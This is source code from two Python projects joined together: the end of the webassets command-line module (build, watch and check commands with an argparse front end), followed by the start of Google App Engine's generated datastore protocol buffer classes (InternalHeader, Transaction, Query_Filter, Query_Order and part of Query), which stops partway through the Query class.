            self.log.debug('no updater configured, using TimestampUpdater')
            updater = TimestampUpdater()
        for bundle in self.environment:
            self.log.info('Checking asset: %s', bundle.output)
            if updater.needs_rebuild(bundle, self.environment):
                self.log.info('  needs update')
                needsupdate = True
        if needsupdate:
            sys.exit(-1)


class CommandLineEnvironment(object):
    """Implements the core functionality for a command line frontend to
    ``webassets``, abstracted in a way to allow frameworks to integrate the
    functionality into their own tools, for example, as a Django management
    command, or a command for ``Flask-Script``.
    """

    def __init__(self, env, log, post_build=None, commands=None):
        self.environment = env
        self.log = log
        self.event_handlers = dict(post_build=lambda: True)
        if callable(post_build):
            self.event_handlers['post_build'] = post_build

        # Instantiate each command
        command_def = self.DefaultCommands.copy()
        command_def.update(commands or {})
        self.commands = {}
        for name, construct in command_def.items():
            if not construct:
                continue
            if not isinstance(construct, (list, tuple)):
                construct = [construct, (), {}]
            self.commands[name] = construct[0](
                self, *construct[1], **construct[2])

    def __getattr__(self, item):
        # Allow method-like access to commands.
        if item in self.commands:
            return self.commands[item]
        raise AttributeError(item)

    def invoke(self, command, args):
        """Invoke ``command``, or throw a CommandError.

        This is essentially a simple validation mechanism. Feel free
        to call the individual command methods manually.
        """
        try:
            function = self.commands[command]
        except KeyError as e:
            raise CommandError('unknown command: %s' % e)
        else:
            return function(**args)

    # List of commands installed
    DefaultCommands = {
        'build': BuildCommand,
        'watch': WatchCommand,
        'clean': CleanCommand,
        'check': CheckCommand
    }


class GenericArgparseImplementation(object):
    """Generic command line utility to interact with an webassets environment.

    This is effectively a reference implementation of a command line utility
    based on the ``CommandLineEnvironment`` class. Implementers may find it
    feasible to simple base their own command line utility on this, rather than
    implementing something custom on top of ``CommandLineEnvironment``. In
    fact, if that is possible, you are encouraged to do so for greater
    consistency across implementations.
    """

    class WatchCommand(WatchCommand):
        """Extended watch command that also looks at the config file itself."""

        def __init__(self, cmd_env, argparse_ns):
            WatchCommand.__init__(self, cmd_env)
            self.ns = argparse_ns

        def yield_files_to_watch(self):
            for result in WatchCommand.yield_files_to_watch(self):
                yield result
            # If the config changes, rebuild all bundles
            if getattr(self.ns, 'config', None):
                yield self.ns.config, self.reload_config

        def reload_config(self):
            try:
                self.cmd.environment = YAMLLoader(self.ns.config).load_environment()
            except Exception as e:
                raise EnvironmentError(e)
            return True


    def __init__(self, env=None, log=None, prog=None, no_global_options=False):
        try:
            import argparse
        except ImportError:
            raise RuntimeError(
                'The webassets command line now requires the '
                '"argparse" library on Python versions <= 2.6.')
        else:
            self.argparse = argparse
        self.env = env
        self.log = log
        self._construct_parser(prog, no_global_options)

    def _construct_parser(self, prog=None, no_global_options=False):
        self.parser = parser = self.argparse.ArgumentParser(
            description="Manage assets.",
            prog=prog)

        if not no_global_options:
            # Start with the base arguments that are valid for any command.
            # XXX: Add those to the subparser?
            parser.add_argument("-v", dest="verbose", action="store_true",
                help="be verbose")
            parser.add_argument("-q", action="store_true", dest="quiet",
                help="be quiet")
            if self.env is None:
                loadenv = parser.add_mutually_exclusive_group()
                loadenv.add_argument("-c", "--config", dest="config",
                    help="read environment from a YAML file")
                loadenv.add_argument("-m", "--module", dest="module",
                    help="read environment from a Python module")

        # Add subparsers.
        subparsers = parser.add_subparsers(dest='command')
        for command in CommandLineEnvironment.DefaultCommands.keys():
            command_parser = subparsers.add_parser(command)
            maker = getattr(self, 'make_%s_parser' % command, False)
            if maker:
                maker(command_parser)

    @staticmethod
    def make_build_parser(parser):
        parser.add_argument(
            'bundles', nargs='*', metavar='BUNDLE',
            help='Optional bundle names to process. If none are '
                 'specified, then all known bundles will be built.')
        parser.add_argument(
            '--output', '-o', nargs=2, action='append',
            metavar=('BUNDLE', 'FILE'),
            help='Build the given bundle, and use a custom output '
                 'file. Can be given multiple times.')
        parser.add_argument(
            '--directory', '-d',
            help='Write built files to this directory, using the '
                 'basename defined by the bundle. Will offset '
                 'the original bundle output paths on their common '
                 'prefix. Cannot be used with --output.')
        parser.add_argument(
            '--no-cache', action='store_true',
            help='Do not use a cache that might be configured.')
        parser.add_argument(
            '--manifest',
            help='Write a manifest to the given file. Also supports '
                 'the id:arg format, if you want to use a different '
                 'manifest implementation.')
        parser.add_argument(
            '--production', action='store_true',
            help='Forcably turn off debug mode for the build. This '
                 'only has an effect if debug is set to "merge".')

    def _setup_logging(self, ns):
        if self.log:
            log = self.log
        else:
            log = logging.getLogger('webassets.script')
            if not log.handlers:
                # In theory, this could run multiple times (e.g. tests)
                handler = logging.StreamHandler()
                log.addHandler(handler)
                # Note that setting the level filter at the handler level is
                # better than the logger level, since this is "our" handler,
                # we create it, for the purposes of having a default output.
                # The logger itself the user may be modifying.
                handler.setLevel(logging.DEBUG if ns.verbose else (
                    logging.WARNING if ns.quiet else logging.INFO))
        return log

    def _setup_assets_env(self, ns, log):
        env = self.env
        if env is None:
            assert not (ns.module and ns.config)
            if ns.module:
                env = PythonLoader(ns.module).load_environment()
            if ns.config:
                env = YAMLLoader(ns.config).load_environment()
        return env

    def _setup_cmd_env(self, assets_env, log, ns):
        return CommandLineEnvironment(assets_env, log, commands={
            'watch': (GenericArgparseImplementation.WatchCommand, (ns,), {})
        })

    def _prepare_command_args(self, ns):
        # Prepare a dict of arguments cleaned of values that are not
        # command-specific, and which the command method would not accept.
        args = vars(ns).copy()
        for action in self.parser._actions:
            dest = action.dest
            if dest in args:
                del args[dest]
        return args

    def run_with_ns(self, ns):
        log = self._setup_logging(ns)
        env = self._setup_assets_env(ns, log)
        if env is None:
            raise CommandError(
                "Error: No environment given or found. Maybe use -m?")
        cmd = self._setup_cmd_env(env, log, ns)

        # Run the selected command
        args = self._prepare_command_args(ns)
        return cmd.invoke(ns.command, args)

    def run_with_argv(self, argv):
        try:
            ns = self.parser.parse_args(argv)
        except SystemExit as e:
            # We do not want the main() function to exit the program.
            # See run() instead.
            return e.args[0]

        return self.run_with_ns(ns)

    def main(self, argv):
        """Parse the given command line.

        The commandline is expected to NOT including what would be sys.argv[0].
        """
        try:
            return self.run_with_argv(argv)
        except CommandError as e:
            print(e)
            return 1


def main(argv, env=None):
    """Execute the generic version of the command line interface.

    You only need to work directly with ``GenericArgparseImplementation`` if
    you desire to customize things.

    If no environment is given, additional arguments will be supported to allow
    the user to specify/construct the environment on the command line.
    """
    return GenericArgparseImplementation(env).main(argv)


def run():
    """Runs the command line interface via ``main``, then exits the process
    with a proper return code."""
    sys.exit(main(sys.argv[1:]) or 0)


if __name__ == '__main__':
    run()

#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#



from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread

__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
                   unusednames=printElemNumber,debug_strs no-special"""

if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'):
  _extension_runtime = True
  _ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage
else:
  _extension_runtime = False
  _ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage

from google.appengine.api.api_base_pb import *
import google.appengine.api.api_base_pb
from google.appengine.datastore.action_pb import *
import google.appengine.datastore.action_pb
from google.appengine.datastore.entity_pb import *
import google.appengine.datastore.entity_pb
from google.appengine.datastore.snapshot_pb import *
import google.appengine.datastore.snapshot_pb
class InternalHeader(ProtocolBuffer.ProtocolMessage):
  has_requesting_app_id_ = 0
  requesting_app_id_ = ""
  has_requesting_project_id_ = 0
  requesting_project_id_ = ""
  has_requesting_version_id_ = 0
  requesting_version_id_ = ""
  has_api_settings_ = 0
  api_settings_ = ""

  def __init__(self, contents=None):
    if contents is not None: self.MergeFromString(contents)

  def requesting_app_id(self): return self.requesting_app_id_

  def set_requesting_app_id(self, x):
    self.has_requesting_app_id_ = 1
    self.requesting_app_id_ = x

  def clear_requesting_app_id(self):
    if self.has_requesting_app_id_:
      self.has_requesting_app_id_ = 0
      self.requesting_app_id_ = ""

  def has_requesting_app_id(self): return self.has_requesting_app_id_

  def requesting_project_id(self): return self.requesting_project_id_

  def set_requesting_project_id(self, x):
    self.has_requesting_project_id_ = 1
    self.requesting_project_id_ = x

  def clear_requesting_project_id(self):
    if self.has_requesting_project_id_:
      self.has_requesting_project_id_ = 0
      self.requesting_project_id_ = ""

  def has_requesting_project_id(self): return self.has_requesting_project_id_

  def requesting_version_id(self): return self.requesting_version_id_

  def set_requesting_version_id(self, x):
    self.has_requesting_version_id_ = 1
    self.requesting_version_id_ = x

  def clear_requesting_version_id(self):
    if self.has_requesting_version_id_:
      self.has_requesting_version_id_ = 0
      self.requesting_version_id_ = ""

  def has_requesting_version_id(self): return self.has_requesting_version_id_

  def api_settings(self): return self.api_settings_

  def set_api_settings(self, x):
    self.has_api_settings_ = 1
    self.api_settings_ = x

  def clear_api_settings(self):
    if self.has_api_settings_:
      self.has_api_settings_ = 0
      self.api_settings_ = ""

  def has_api_settings(self): return self.has_api_settings_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_requesting_app_id()): self.set_requesting_app_id(x.requesting_app_id())
    if (x.has_requesting_project_id()): self.set_requesting_project_id(x.requesting_project_id())
    if (x.has_requesting_version_id()): self.set_requesting_version_id(x.requesting_version_id())
    if (x.has_api_settings()): self.set_api_settings(x.api_settings())

  def Equals(self, x):
    if x is self: return 1
    if self.has_requesting_app_id_ != x.has_requesting_app_id_: return 0
    if self.has_requesting_app_id_ and self.requesting_app_id_ != x.requesting_app_id_: return 0
    if self.has_requesting_project_id_ != x.has_requesting_project_id_: return 0
    if self.has_requesting_project_id_ and self.requesting_project_id_ != x.requesting_project_id_: return 0
    if self.has_requesting_version_id_ != x.has_requesting_version_id_: return 0
    if self.has_requesting_version_id_ and self.requesting_version_id_ != x.requesting_version_id_: return 0
    if self.has_api_settings_ != x.has_api_settings_: return 0
    if self.has_api_settings_ and self.api_settings_ != x.api_settings_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_requesting_app_id_): n += 1 + self.lengthString(len(self.requesting_app_id_))
    if (self.has_requesting_project_id_): n += 1 + self.lengthString(len(self.requesting_project_id_))
    if (self.has_requesting_version_id_): n += 1 + self.lengthString(len(self.requesting_version_id_))
    if (self.has_api_settings_): n += 1 + self.lengthString(len(self.api_settings_))
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_requesting_app_id_): n += 1 + self.lengthString(len(self.requesting_app_id_))
    if (self.has_requesting_project_id_): n += 1 + self.lengthString(len(self.requesting_project_id_))
    if (self.has_requesting_version_id_): n += 1 + self.lengthString(len(self.requesting_version_id_))
    if (self.has_api_settings_): n += 1 + self.lengthString(len(self.api_settings_))
    return n

  def Clear(self):
    self.clear_requesting_app_id()
    self.clear_requesting_project_id()
    self.clear_requesting_version_id()
    self.clear_api_settings()

  def OutputUnchecked(self, out):
    if (self.has_requesting_app_id_):
      out.putVarInt32(18)
      out.putPrefixedString(self.requesting_app_id_)
    if (self.has_api_settings_):
      out.putVarInt32(26)
      out.putPrefixedString(self.api_settings_)
    if (self.has_requesting_project_id_):
      out.putVarInt32(34)
      out.putPrefixedString(self.requesting_project_id_)
    if (self.has_requesting_version_id_):
      out.putVarInt32(42)
      out.putPrefixedString(self.requesting_version_id_)

  def OutputPartial(self, out):
    if (self.has_requesting_app_id_):
      out.putVarInt32(18)
      out.putPrefixedString(self.requesting_app_id_)
    if (self.has_api_settings_):
      out.putVarInt32(26)
      out.putPrefixedString(self.api_settings_)
    if (self.has_requesting_project_id_):
      out.putVarInt32(34)
      out.putPrefixedString(self.requesting_project_id_)
    if (self.has_requesting_version_id_):
      out.putVarInt32(42)
      out.putPrefixedString(self.requesting_version_id_)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 18:
        self.set_requesting_app_id(d.getPrefixedString())
        continue
      if tt == 26:
        self.set_api_settings(d.getPrefixedString())
        continue
      if tt == 34:
        self.set_requesting_project_id(d.getPrefixedString())
        continue
      if tt == 42:
        self.set_requesting_version_id(d.getPrefixedString())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_requesting_app_id_: res+=prefix+("requesting_app_id: %s\n" % self.DebugFormatString(self.requesting_app_id_))
    if self.has_requesting_project_id_: res+=prefix+("requesting_project_id: %s\n" % self.DebugFormatString(self.requesting_project_id_))
    if self.has_requesting_version_id_: res+=prefix+("requesting_version_id: %s\n" % self.DebugFormatString(self.requesting_version_id_))
    if self.has_api_settings_: res+=prefix+("api_settings: %s\n" % self.DebugFormatString(self.api_settings_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  krequesting_app_id = 2
  krequesting_project_id = 4
  krequesting_version_id = 5
  kapi_settings = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    2: "requesting_app_id",
    3: "api_settings",
    4: "requesting_project_id",
    5: "requesting_version_id",
  }, 5)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
    4: ProtocolBuffer.Encoder.STRING,
    5: ProtocolBuffer.Encoder.STRING,
  }, 5, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.InternalHeader'
class Transaction(ProtocolBuffer.ProtocolMessage):
  has_header_ = 0
  header_ = None
  has_handle_ = 0
  handle_ = 0
  has_app_ = 0
  app_ = ""
  has_mark_changes_ = 0
  mark_changes_ = 0

  def __init__(self, contents=None):
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def handle(self): return self.handle_

  def set_handle(self, x):
    self.has_handle_ = 1
    self.handle_ = x

  def clear_handle(self):
    if self.has_handle_:
      self.has_handle_ = 0
      self.handle_ = 0

  def has_handle(self): return self.has_handle_

  def app(self): return self.app_

  def set_app(self, x):
    self.has_app_ = 1
    self.app_ = x

  def clear_app(self):
    if self.has_app_:
      self.has_app_ = 0
      self.app_ = ""

  def has_app(self): return self.has_app_

  def mark_changes(self): return self.mark_changes_

  def set_mark_changes(self, x):
    self.has_mark_changes_ = 1
    self.mark_changes_ = x

  def clear_mark_changes(self):
    if self.has_mark_changes_:
      self.has_mark_changes_ = 0
      self.mark_changes_ = 0

  def has_mark_changes(self): return self.has_mark_changes_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_handle()): self.set_handle(x.handle())
    if (x.has_app()): self.set_app(x.app())
    if (x.has_mark_changes()): self.set_mark_changes(x.mark_changes())

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_handle_ != x.has_handle_: return 0
    if self.has_handle_ and self.handle_ != x.handle_: return 0
    if self.has_app_ != x.has_app_: return 0
    if self.has_app_ and self.app_ != x.app_: return 0
    if self.has_mark_changes_ != x.has_mark_changes_: return 0
    if self.has_mark_changes_ and self.mark_changes_ != x.mark_changes_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_handle_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: handle not set.')
    if (not self.has_app_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: app not set.')
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(len(self.app_))
    if (self.has_mark_changes_): n += 2
    return n + 10

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_handle_):
      n += 9
    if (self.has_app_):
      n += 1
      n += self.lengthString(len(self.app_))
    if (self.has_mark_changes_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_handle()
    self.clear_app()
    self.clear_mark_changes()

  def OutputUnchecked(self, out):
    out.putVarInt32(9)
    out.put64(self.handle_)
    out.putVarInt32(18)
    out.putPrefixedString(self.app_)
    if (self.has_mark_changes_):
      out.putVarInt32(24)
      out.putBoolean(self.mark_changes_)
    if (self.has_header_):
      out.putVarInt32(34)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_handle_):
      out.putVarInt32(9)
      out.put64(self.handle_)
    if (self.has_app_):
      out.putVarInt32(18)
      out.putPrefixedString(self.app_)
    if (self.has_mark_changes_):
      out.putVarInt32(24)
      out.putBoolean(self.mark_changes_)
    if (self.has_header_):
      out.putVarInt32(34)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 9:
        self.set_handle(d.get64())
        continue
      if tt == 18:
        self.set_app(d.getPrefixedString())
        continue
      if tt == 24:
        self.set_mark_changes(d.getBoolean())
        continue
      if tt == 34:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_handle_: res+=prefix+("handle: %s\n" % self.DebugFormatFixed64(self.handle_))
    if self.has_app_: res+=prefix+("app: %s\n" % self.DebugFormatString(self.app_))
    if self.has_mark_changes_: res+=prefix+("mark_changes: %s\n" % self.DebugFormatBool(self.mark_changes_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 4
  khandle = 1
  kapp = 2
  kmark_changes = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "handle",
    2: "app",
    3: "mark_changes",
    4: "header",
  }, 4)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.DOUBLE,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.STRING,
  }, 4, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Transaction'
class Query_Filter(ProtocolBuffer.ProtocolMessage):


  LESS_THAN    =    1
  LESS_THAN_OR_EQUAL =    2
  GREATER_THAN =    3
  GREATER_THAN_OR_EQUAL =    4
  EQUAL        =    5
  IN           =    6
  EXISTS       =    7

  _Operator_NAMES = {
    1: "LESS_THAN",
    2: "LESS_THAN_OR_EQUAL",
    3: "GREATER_THAN",
    4: "GREATER_THAN_OR_EQUAL",
    5: "EQUAL",
    6: "IN",
    7: "EXISTS",
  }

  def Operator_Name(cls, x): return cls._Operator_NAMES.get(x, "")
  Operator_Name = classmethod(Operator_Name)

  has_op_ = 0
  op_ = 0

  def __init__(self, contents=None):
    self.property_ = []
    if contents is not None: self.MergeFromString(contents)

  def op(self): return self.op_

  def set_op(self, x):
    self.has_op_ = 1
    self.op_ = x

  def clear_op(self):
    if self.has_op_:
      self.has_op_ = 0
      self.op_ = 0

  def has_op(self): return self.has_op_

  def property_size(self): return len(self.property_)
  def property_list(self): return self.property_

  def property(self, i):
    return self.property_[i]

  def mutable_property(self, i):
    return self.property_[i]

  def add_property(self):
    x = Property()
    self.property_.append(x)
    return x

  def clear_property(self):
    self.property_ = []

  def MergeFrom(self, x):
    assert x is not self
    if (x.has_op()): self.set_op(x.op())
    for i in xrange(x.property_size()): self.add_property().CopyFrom(x.property(i))

  def Equals(self, x):
    if x is self: return 1
    if self.has_op_ != x.has_op_: return 0
    if self.has_op_ and self.op_ != x.op_: return 0
    if len(self.property_) != len(x.property_): return 0
    for e1, e2 in zip(self.property_, x.property_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (not self.has_op_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: op not set.')
    for p in self.property_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    n += self.lengthVarInt64(self.op_)
    n += 1 * len(self.property_)
    for i in xrange(len(self.property_)): n += self.lengthString(self.property_[i].ByteSize())
    return n + 1

  def ByteSizePartial(self):
    n = 0
    if (self.has_op_):
      n += 1
      n += self.lengthVarInt64(self.op_)
    n += 1 * len(self.property_)
    for i in xrange(len(self.property_)): n += self.lengthString(self.property_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_op()
    self.clear_property()

  def OutputUnchecked(self, out):
    out.putVarInt32(48)
    out.putVarInt32(self.op_)
    for i in xrange(len(self.property_)):
      out.putVarInt32(114)
      out.putVarInt32(self.property_[i].ByteSize())
      self.property_[i].OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_op_):
      out.putVarInt32(48)
      out.putVarInt32(self.op_)
    for i in xrange(len(self.property_)):
      out.putVarInt32(114)
      out.putVarInt32(self.property_[i].ByteSizePartial())
      self.property_[i].OutputPartial(out)

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 36: break
      if tt == 48:
        self.set_op(d.getVarInt32())
        continue
      if tt == 114:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_property().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_op_: res+=prefix+("op: %s\n" % self.DebugFormatInt32(self.op_))
    cnt=0
    for e in self.property_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("property%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res

class Query_Order(ProtocolBuffer.ProtocolMessage):


  ASCENDING    =    1
  DESCENDING   =    2

  _Direction_NAMES = {
    1: "ASCENDING",
    2: "DESCENDING",
  }

  def Direction_Name(cls, x): return cls._Direction_NAMES.get(x, "")
  Direction_Name = classmethod(Direction_Name)

  has_property_ = 0
  property_ = ""
  has_direction_ = 0
  direction_ = 1

  def __init__(self, contents=None):
    if contents is not None: self.MergeFromString(contents)

  def property(self): return self.property_

  def set_property(self, x):
    self.has_property_ = 1
    self.property_ = x

  def clear_property(self):
    if self.has_property_:
      self.has_property_ = 0
      self.property_ = ""

  def has_property(self): return self.has_property_

  def direction(self): return self.direction_

  def set_direction(self, x):
    self.has_direction_ = 1
    self.direction_ = x

  def clear_direction(self):
    if self.has_direction_:
      self.has_direction_ = 0
      self.direction_ = 1

  def has_direction(self): return self.has_direction_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_property()): self.set_property(x.property())
    if (x.has_direction()): self.set_direction(x.direction())

  def Equals(self, x):
    if x is self: return 1
    if self.has_property_ != x.has_property_: return 0
    if self.has_property_ and self.property_ != x.property_: return 0
    if self.has_direction_ != x.has_direction_: return 0
    if self.has_direction_ and self.direction_ != x.direction_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (not self.has_property_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: property not set.')
    return initialized

  def ByteSize(self):
    n = 0
    n += self.lengthString(len(self.property_))
    if (self.has_direction_): n += 1 + self.lengthVarInt64(self.direction_)
    return n + 1

  def ByteSizePartial(self):
    n = 0
    if (self.has_property_):
      n += 1
      n += self.lengthString(len(self.property_))
    if (self.has_direction_): n += 1 + self.lengthVarInt64(self.direction_)
    return n

  def Clear(self):
    self.clear_property()
    self.clear_direction()

  def OutputUnchecked(self, out):
    out.putVarInt32(82)
    out.putPrefixedString(self.property_)
    if (self.has_direction_):
      out.putVarInt32(88)
      out.putVarInt32(self.direction_)

  def OutputPartial(self, out):
    if (self.has_property_):
      out.putVarInt32(82)
      out.putPrefixedString(self.property_)
    if (self.has_direction_):
      out.putVarInt32(88)
      out.putVarInt32(self.direction_)

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 76: break
      if tt == 82:
        self.set_property(d.getPrefixedString())
        continue
      if tt == 88:
        self.set_direction(d.getVarInt32())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_property_: res+=prefix+("property: %s\n" % self.DebugFormatString(self.property_))
    if self.has_direction_: res+=prefix+("direction: %s\n" % self.DebugFormatInt32(self.direction_))
    return res

class Query(ProtocolBuffer.ProtocolMessage):


  ORDER_FIRST  =    1
  ANCESTOR_FIRST =    2
  FILTER_FIRST =    3

  _Hint_NAMES = {
    1: "ORDER_FIRST",
    2: "ANCESTOR_FIRST",
    3: "FILTER_FIRST",
  }

  def Hint_Name(cls, x): return cls._Hint_NAMES.get(x, "")
  Hint_Name = classmethod(Hint_Name)

  has_header_ = 0
  header_ = None
  has_app_ = 0
  app_ = ""
  has_name_space_ = 0
  name_space_ = ""
  has_kind_ = 0
  kind_ = ""
  has_ancestor_ = 0
  ancestor_ = None
  has_search_query_ = 0
  search_query_ = ""
  has_hint_ = 0
  hint_ = 0
  has_count_ = 0
  count_ = 0
  has_offset_ = 0
  offset_ = 0
  has_limit_ = 0
  limit_ = 0
  has_compiled_cursor_ = 0
  compiled_cursor_ = None
  has_end_compiled_cursor_ = 0
  end_compiled_cursor_ = None
  has_require_perfect_plan_ = 0
  require_perfect_plan_ = 0
  has_keys_only_ = 0
  keys_only_ = 0
  has_transaction_ = 0
  transaction_ = None
  has_compile_ = 0
  compile_ = 0
  has_failover_ms_ = 0
  failover_ms_ = 0
  has_strong_ = 0
  strong_ = 0
  has_distinct_ = 0
  distinct_ = 0
  has_min_safe_time_seconds_ = 0
  min_safe_time_seconds_ = 0
  has_persist_offset_ = 0
  persist_offset_ = 1

  def __init__(self, contents=None):
    self.filter_ = []
    self.order_ = []
    self.composite_index_ = []
    self.property_name_ = []
    self.group_by_property_name_ = []
    self.safe_replica_name_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def app(self): return self.app_

  def set_app(self, x):
    self.has_app_ = 1
    self.app_ = x

  def clear_app(self):
    if self.has_app_:
      self.has_app_ = 0
      self.app_ = ""

  def has_app(self): return self.has_app_

  def name_space(self): return self.name_space_

  def set_name_space(self, x):
    self.has_name_space_ = 1
    self.name_space_ = x

  def clear_name_space(self):
    if self.has_name_space_:
      self.has_name_space_ = 0
      self.name_space_ = ""

  def has_name_space(self): return self.has_name_space_

  def kind(self): return self.kind_

  def set_kind(self, x):
    self.has_kind_ = 1
    self.kind_ = x

  def clear_kind(self):
    if self.has_kind_:
      self.has_kind_ = 0
      self.kind_ = ""

  def has_kind(self): return self.has_kind_

  def ancestor(self):
    if self.ancestor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.ancestor_ is None: self.ancestor_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.ancestor_

  def mutable_ancestor(self): self.has_ancestor_ = 1; return self.ancestor()

  def clear_ancestor(self):

    if self.has_ancestor_:
      self.has_ancestor_ = 0;
      if self.ancestor_ is not None: self.ancestor_.Clear()

  def has_ancestor(self): return self.has_ancestor_

  def filter_size(self): return len(self.filter_)
  def filter_list(self): return self.filter_

  def filter(self, i):
    return self.filter_[i]

  def mutable_filter(self, i):
    return self.filter_[i]

  def add_filter(self):
    x = Query_Filter()
    self.filter_.append(x)
    return x

  def clear_filter(self):
    self.filter_ = []
  def search_query(self): return self.search_query_

  def set_search_query(self, x):
    self.has_search_query_ = 1
    self.search_query_ = x

  def clear_search_query(self):
    if self.has_search_query_:
      self.has_search_query_ = 0
      self.search_query_ = ""

  def has_search_query(self): return self.has_search_query_

  def order_size(self): return len(self.order_)
  def order_list(self): return self.order_

  def order(self, i):
    return self.order_[i]

  def mutable_order(self, i):
    return self.order_[i]

  def add_order(self):
    x = Query_Order()
    self.order_.append(x)
    return x

  def clear_order(self):
    self.order_ = []
  def hint(self): return self.hint_

